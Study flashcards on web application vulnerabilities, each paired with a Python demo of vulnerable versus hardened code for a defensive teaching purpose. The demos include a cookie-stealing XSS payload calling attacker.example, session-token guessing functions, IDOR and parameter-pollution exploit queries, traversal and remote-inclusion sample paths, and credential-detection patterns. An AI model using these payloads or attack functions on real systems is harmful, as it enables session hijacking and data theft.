Application Based Vulnerabilities Flashcards

1
Q

Injection Attacks (Application Vulnerabilities)

A
  • insertion of additional code or data via an input from a client so that the application interprets it as part of a command, query or document instead of as plain data
  • most common through SQL, but can also be HTML, OS command or code injection - preventable through input validation, parameterised queries/safe APIs, and least privilege for database accounts
2
Q

SQL Injection (Application Vulnerabilities)

A
  • injection of SQL statements through unvalidated input that is concatenated into a database query; a specific form of injection attack
3
Q

Authentication (Application Vulnerabilities)

A
  • credential brute forcing - repeated login attempts against one or many accounts
  • session hijacking - attacks the web session control mechanism by taking over a session through a stolen or guessed session token
  • open redirect - the app forwards the user to an attacker-supplied URL, sending them to a malicious page
  • default credentials
  • weak credentials
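The session hijacking bullet above says a session can be taken over by guessing the token. As an added example that is not part of the original flashcards, this shows why a token drawn from a time-seeded general-purpose PRNG is guessable while one from the OS CSPRNG is not. The login timestamp and token length are constructed for the demo.

```python
import random
import secrets

TOKEN_BYTES = 16
LOGIN_TIME = 1_700_000_000  # constructed Unix timestamp of a login


def weak_token(seed):
    """Token from Python's Mersenne Twister seeded with the login time. The
    generator is deterministic, so the seed alone reproduces the token."""
    rng = random.Random(seed)
    return rng.getrandbits(TOKEN_BYTES * 8).to_bytes(TOKEN_BYTES, "big").hex()


def strong_token():
    """Token from the OS CSPRNG: 128 bits that cannot be regenerated."""
    return secrets.token_hex(TOKEN_BYTES)


def recover_seed(own_token, approx_login_time, window=300):
    """Attacker step 1: log in with an attacker-owned account, note the time to
    within a few minutes, and search the window for the seed that reproduces
    the issued token. Success confirms the generator is time-seeded."""
    for seed in range(approx_login_time - window, approx_login_time + window + 1):
        if weak_token(seed) == own_token:
            return seed
    return None


def candidate_tokens(victim_login_time, window=300):
    """Attacker step 2: for a victim known to have logged in around a given
    time, enumerate every token the generator could have issued. Each entry is
    one session-hijack guess; 601 guesses instead of 2**128."""
    return {
        weak_token(s)
        for s in range(victim_login_time - window, victim_login_time + window + 1)
    }


if __name__ == "__main__":
    mine = weak_token(LOGIN_TIME)
    print(recover_seed(mine, LOGIN_TIME + 47))            # 1700000000
    victim = weak_token(LOGIN_TIME + 900)
    print(victim in candidate_tokens(LOGIN_TIME + 930))   # True
    print(strong_token() in candidate_tokens(LOGIN_TIME)) # False
```

The hardening is the one-line change to secrets.token_hex (or the framework's session store, which does the same); the attacker code is only there to make the size of the guess space concrete.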
4
Q

Kerberos Authentication (Application Vulnerabilities)

A
  • Kerberos is a ticket-based system that lets devices identify themselves and communicate over a non-secure network; a ticket-granting ticket (TGT) issued by the KDC is exchanged for service tickets
  • golden ticket - a forged Kerberos ticket-granting ticket (TGT) created with the KRBTGT account's key; it can be used to request access to any Kerberos service in the domain
  • silver ticket - a forged Kerberos service ticket (TGS ticket), not a TGT, created with the target service account's key; it can be used only for that specific Kerberos service
5
Q

Parameter Pollution - Authorization (Application Vulnerabilities)

A
  • HTTP parameter pollution - the attacker supplies duplicate or modified HTTP parameters (e.g. the same name twice in a query string) to exploit differences in how the front end validates and the back end parses them, bypassing authorization checks
6
Q

Insecure Direct Object Reference - Authorization (Application Vulnerabilities)

A
  • app provides direct access to an object (file, database record, key) based on user-supplied input without verifying that the requesting user is authorized for that object
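The parameter pollution and insecure direct object reference cards above, as one added example that is not part of the original flashcards: an invoice lookup with no ownership check (IDOR), a version whose front-end filter validates only the first id value while the back end uses the last (parameter pollution bypass), and a hardened version that rejects duplicate parameters and checks ownership. The invoice table, user names and query strings are constructed for the demo.

```python
from urllib.parse import parse_qs, parse_qsl

# Constructed data store: invoice id -> owner and amount (not from the page).
INVOICES = {
    "1001": {"owner": "alice", "amount": 120},
    "1002": {"owner": "bob", "amount": 75},
}


def owned_ids(user):
    return {inv_id for inv_id, inv in INVOICES.items() if inv["owner"] == user}


def get_invoice_idor(query_string, current_user):
    """IDOR: the record is fetched straight from the user-supplied id; the
    logged-in user is never compared with the record's owner."""
    params = dict(parse_qsl(query_string))
    return INVOICES.get(params.get("id"))


def get_invoice_hpp(query_string, current_user):
    """Parameter pollution: the filter looks at the FIRST 'id' (parse_qs keeps
    all values in order) but the lookup uses dict(parse_qsl()), which keeps the
    LAST duplicate. id=<own>&id=<victim> passes the filter and reads the victim's record."""
    first_id = parse_qs(query_string).get("id", [None])[0]
    if first_id not in owned_ids(current_user):
        return None
    last_id = dict(parse_qsl(query_string)).get("id")
    return INVOICES.get(last_id)


def get_invoice_hardened(query_string, current_user):
    """Hardened: exactly one id parameter is accepted, and the record is only
    returned when its owner is the authenticated user."""
    ids = parse_qs(query_string, keep_blank_values=True).get("id", [])
    if len(ids) != 1:
        return None  # missing or polluted parameter
    invoice = INVOICES.get(ids[0])
    if invoice is None or invoice["owner"] != current_user:
        return None  # authorization check on the object itself
    return invoice


if __name__ == "__main__":
    print(get_invoice_idor("id=1001", "bob"))              # alice's invoice leaks
    print(get_invoice_hpp("id=1002", "alice"))             # None: filter works alone
    print(get_invoice_hpp("id=1001&id=1002", "alice"))     # bob's invoice leaks
    print(get_invoice_hardened("id=1001&id=1002", "alice"))  # None
    print(get_invoice_hardened("id=1001", "bob"))          # None
    print(get_invoice_hardened("id=1001", "alice"))        # alice's own invoice
```

Which duplicate a parser keeps (first, last, or a list) differs between frameworks and between a web server and the application behind it; the hardened function sidesteps the question by refusing anything other than exactly one value.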
7
Q

Cross Site Scripting XSS (Application Vulnerabilities)

A
  • attacker embeds malicious script in a trusted website so that it runs in victims' browsers; the target is the user, not the server
  • stored/persistent - data provided by the attacker is saved on the server and served to every user who views the page
  • reflected - non-persistent, the payload is carried in a request (usually a crafted link) and echoed back in the response
  • DOM-based - client-side JavaScript writes attacker-controlled data (e.g. from the URL fragment) into the Document Object Model (DOM); the victim's browser is exploited without the payload ever reaching the server (client-side XSS)
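The stored and reflected variants on the XSS card, as an added example that is not part of the original flashcards: a comment renderer and a search-echo renderer that concatenate untrusted strings into HTML, beside versions that escape for the HTML element context first. The payload, page fragments and the active-content check are constructed for the demo.

```python
import html
import re

# Constructed attacker payload (not from the page): an <img> whose error
# handler sends the victim's cookie to an attacker-controlled host.
PAYLOAD = "<img src=x onerror=\"fetch('https://attacker.example/?c='+document.cookie)\">"


def render_comment_vulnerable(author, body):
    """Stored XSS: the saved comment is concatenated straight into the page."""
    return f"<div class=\"comment\"><b>{author}</b>: {body}</div>"


def render_comment_hardened(author, body):
    """Escape &, <, >, and quotes so the comment can only ever be text."""
    return (
        f"<div class=\"comment\"><b>{html.escape(author, quote=True)}</b>: "
        f"{html.escape(body, quote=True)}</div>"
    )


def render_search_vulnerable(q):
    """Reflected XSS: the query parameter from the crafted link is echoed back."""
    return f"<h2>Results for {q}</h2>"


def render_search_hardened(q):
    return f"<h2>Results for {html.escape(q, quote=True)}</h2>"


# Demo check: an unescaped tag carrying an on*= handler, or a <script> element.
ACTIVE_CONTENT = re.compile(r"<\w+[^>]*\bon\w+\s*=|<script\b", re.I)


def contains_active_content(fragment):
    return ACTIVE_CONTENT.search(fragment) is not None


if __name__ == "__main__":
    print(contains_active_content(render_comment_vulnerable("mallory", PAYLOAD)))  # True
    print(contains_active_content(render_comment_hardened("mallory", PAYLOAD)))    # False
    print(render_comment_hardened("mallory", PAYLOAD))   # shows &lt;img ... instead of a tag
    link_q = "<script>alert(document.cookie)</script>"
    print(contains_active_content(render_search_vulnerable(link_q)))  # True
    print(contains_active_content(render_search_hardened(link_q)))    # False
```

Escaping is context-specific: html.escape is right for text between tags and for quoted attribute values, but it does nothing for data placed in a JavaScript block or in an href that may carry a javascript: URL, and it cannot help with the DOM-based variant at all, where the fix is in the client-side script (write to textContent rather than innerHTML). A Content-Security-Policy that disallows inline script is the complementary control for all three variants.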
8
Q

Cross Site Request Forgery CSRF (Application Vulnerabilities)

A
  • attacker tricks an authenticated user's browser into sending a request to a web application the user is logged in to (e.g. via a hidden form on a malicious page); the attacker cannot see the server's response, but the forged request can make the victim transfer funds, change a password and more
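The CSRF card above, as an added example that is not part of the original flashcards: a funds-transfer handler that trusts the session cookie alone, beside one that also requires a per-session anti-CSRF token and compares it in constant time. The server secret, session id and request bodies are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Constructed server-side secret (in practice loaded from a key store, not
# generated at import time, so it survives restarts and multiple workers).
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id):
    """Token bound to the session: HMAC(secret, session_id). A malicious site
    can make the browser send the cookie, but the same-origin policy stops it
    reading the token out of the real site's page, and without the secret it
    cannot compute the token itself."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def transfer_vulnerable(form, session_id):
    """Vulnerable: any POST carrying the session cookie is acted on, including
    one auto-submitted by a hidden form on an attacker's page."""
    if session_id is None:
        return "unauthenticated"
    return f"transferred {form['amount']} to {form['to']}"


def transfer_hardened(form, session_id):
    """Hardened: the form must carry the token that only the real site's page
    could have embedded; compare_digest avoids a timing side channel."""
    if session_id is None:
        return "unauthenticated"
    expected = csrf_token_for(session_id)
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return "rejected: missing or invalid CSRF token"
    return f"transferred {form['amount']} to {form['to']}"


if __name__ == "__main__":
    session = "sess-abc123"  # constructed session id from the victim's cookie
    forged = {"amount": 1000, "to": "mallory"}  # hidden form on attacker's page
    print(transfer_vulnerable(forged, session))  # transferred 1000 to mallory
    print(transfer_hardened(forged, session))    # rejected: ...
    legit = {"amount": 25, "to": "bob", "csrf_token": csrf_token_for(session)}
    print(transfer_hardened(legit, session))     # transferred 25 to bob
```

Setting SameSite=Lax or Strict on the session cookie is a second, independent layer: the browser then omits the cookie on cross-site POSTs, so the forged request arrives unauthenticated before the token check even runs.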
9
Q

Clickjacking (Application Vulnerabilities)

A
  • uses one or more transparent or disguised layers to trick a user into clicking a button or link on a hidden page when they intended to click on the visible page; hyperlinks are concealed under legitimate-looking clickable content
10
Q

Security Misconfiguration (Application Vulnerabilities)

A
  • attacks rely on the app or server using insecure or default settings
  • Directory traversal - user-supplied path fragments such as ../ let the attacker read files in restricted directories, and in some cases execute commands, outside of the web server's root directory
  • Cookie Manipulation - DOM-based cookie manipulation that allows a script to write attacker-controlled data into the value of a client-stored cookie
11
Q

File Inclusion (Application Vulnerabilities)

A
  • includes a file into the targeted application by exploiting a dynamic file inclusion mechanism (e.g. a page parameter passed to include()), usually due to lack of input validation
  • Local (LFI) - a path on the server, e.g. ../../uploads/malware.exe
  • Remote (RFI) - a URL fetched by the server, e.g. https://www.xyz.com/malware.exe
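The directory traversal bullet on the security misconfiguration card and the file inclusion card above, as one added example that is not part of the original flashcards: the unchecked join-and-include mechanism that both attacks exploit, beside a resolver that rejects URLs, absolute paths, NUL bytes and any path that normalises to a location outside the web root. The web root is constructed for the demo; the two sample values are the page's own LFI and RFI examples. posixpath is used so the result is the same on every platform.

```python
import posixpath
from urllib.parse import unquote, urlparse

WEB_ROOT = "/var/www/app/pages"  # constructed document root for the demo


def resolve_include_vulnerable(user_value):
    """The classic dynamic-include mechanism: a URL is fetched remotely (RFI),
    anything else is joined to the base directory (LFI), with no validation."""
    if urlparse(user_value).scheme in ("http", "https"):
        return ("remote", user_value)
    return ("local", posixpath.normpath(posixpath.join(WEB_ROOT, user_value)))


def resolve_include_hardened(user_value):
    """Returns a path inside WEB_ROOT, or None if the value is a URL, an
    absolute path, contains a NUL byte, or escapes the root after normalisation."""
    value = unquote(user_value)  # validate the decoded value the include would use
    if urlparse(value).scheme or "\x00" in value or posixpath.isabs(value):
        return None
    candidate = posixpath.normpath(posixpath.join(WEB_ROOT, value))
    # commonpath rather than a string-prefix test: "/var/www/app/pages2/x"
    # would pass candidate.startswith(WEB_ROOT) yet lies outside the root
    if posixpath.commonpath([WEB_ROOT, candidate]) != WEB_ROOT:
        return None
    return candidate


if __name__ == "__main__":
    for v in ("../../uploads/malware.exe", "https://www.xyz.com/malware.exe",
              "/etc/passwd", "..%2F..%2Fetc%2Fpasswd", "about.html", "docs/../faq.html"):
        print(repr(v), resolve_include_vulnerable(v), resolve_include_hardened(v))
```

normpath works on the string only; on a real filesystem a symlink inside the root can still point outside it, so an include that must accept free-form names should additionally resolve with os.path.realpath before the commonpath test. Where the set of includable pages is known in advance, an allow-list of names mapped to files removes the problem entirely and is the better design.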
12
Q

Insecure Code Practices (Application Vulnerabilities)

A
  • comments in source code that leak internal details
  • lack of error handling
  • verbose error handling (stack traces, SQL errors, internal paths returned to the client)
  • hard coded credentials - credentials are written in the source code instead of a separate, protected configuration/include file
  • race conditions
  • unauthorized use of function/unprotected API
  • hidden elements
  • lack of code signing
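The hard-coded credentials and source-code comments items above, as an added example that is not part of the original flashcards: a small scanner that flags credential literals assigned in source (while letting environment lookups and placeholder values through) and comments that mention backdoors or default credentials. The sample source lines it runs over are constructed for the demo and the rules are deliberately simple; a real secret scanner adds entropy checks and provider-specific key formats.

```python
import re

# Constructed sample source to scan (not from the page).
SAMPLE_SOURCE = """\
import os
DB_PASSWORD = "Sup3rS3cret!"
api_key = 'k3y-0123456789abcdef'
token = os.environ["SERVICE_TOKEN"]
# TODO: remove debug backdoor user admin/admin before release
conn = connect(host="db", user="app", password=os.environ.get("DB_PASS"))
smtp_password: "${SMTP_PASSWORD}"
"""

# identifier containing a credential-like word, assigned a quoted literal
SECRET_ASSIGN = re.compile(
    r'(?i)(\w*(?:password|passwd|pwd|secret|token|api_?key)\w*)\s*[=:]\s*["\']([^"\']+)["\']'
)
# values that are templates or placeholders rather than real secrets
PLACEHOLDER = re.compile(r'^(\$\{[^}]*\}|<[^>]*>|\{\{.*\}\}|x{3,}|changeme)$', re.I)
# comments that document a backdoor or default credentials
COMMENT_LEAK = re.compile(
    r'(?i)(#|//|/\*).*\b(backdoor|default (?:password|credentials?)|admin/admin)\b'
)


def scan_source(text):
    """Returns (line_number, rule, identifier-or-None) for each finding."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = SECRET_ASSIGN.search(line)
        if m and len(m.group(2)) >= 4 and not PLACEHOLDER.match(m.group(2)):
            findings.append((n, "hardcoded_credential", m.group(1)))
        if COMMENT_LEAK.search(line):
            findings.append((n, "credential_in_comment", None))
    return findings


if __name__ == "__main__":
    for finding in scan_source(SAMPLE_SOURCE):
        print(finding)
    # (2, 'hardcoded_credential', 'DB_PASSWORD')
    # (3, 'hardcoded_credential', 'api_key')
    # (5, 'credential_in_comment', None)
```

Lines 4, 6 and 7 of the sample show the pattern the card recommends instead: the value comes from the environment or a templated configuration file, so the source can be committed and shared without carrying the secret.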